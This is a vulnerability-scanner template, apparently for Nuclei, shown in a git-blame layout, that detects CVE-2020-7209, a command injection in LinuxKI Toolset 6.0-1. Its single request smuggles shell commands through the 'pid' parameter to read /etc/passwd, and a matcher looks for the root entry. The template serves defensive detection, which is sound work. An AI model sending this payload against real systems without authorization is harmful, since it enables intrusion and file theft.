2021-01-02 04:56:15 +00:00
|
|
|
id: CVE-2020-7209
|
2020-07-07 19:28:16 +00:00
|
|
|
|
|
|
|
info:
|
|
|
|
name: LinuxKI Toolset 6.01 Remote Command Execution
|
|
|
|
author: dwisiswant0
|
|
|
|
severity: critical
|
2021-02-05 19:44:41 +00:00
|
|
|
tags: cve,cve2020,rce
|
2021-09-05 21:13:45 +00:00
|
|
|
description: LinuxKI v6.0-1 and earlier are vulnerable to a remote code execution. This is resolved in release 6.0-2.
|
2021-03-18 15:13:07 +00:00
|
|
|
reference:
|
2021-08-19 13:15:35 +00:00
|
|
|
- http://packetstormsecurity.com/files/157739/HP-LinuxKI-6.01-Remote-Command-Injection.html
|
|
|
|
- http://packetstormsecurity.com/files/158025/LinuxKI-Toolset-6.01-Remote-Command-Execution.html
|
|
|
|
- https://github.com/HewlettPackard/LinuxKI/releases/tag/v6.0-2
|
|
|
|
- https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78
|
|
|
|
- https://www.hpe.com/us/en/home.html # vendor homepage
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
|
|
cvss-score: 9.80
|
|
|
|
cve-id: CVE-2020-7209
|
2020-07-07 19:28:16 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
2020-09-01 13:08:31 +00:00
|
|
|
- "{{BaseURL}}/linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END;"
|
|
|
|
|
2020-07-07 19:28:16 +00:00
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
2020-09-01 13:08:31 +00:00
|
|
|
- type: regex
|
|
|
|
regex:
|
2021-07-24 21:35:55 +00:00
|
|
|
- "root:.*:0:0:"
|
2020-07-07 19:28:16 +00:00
|
|
|
part: body
|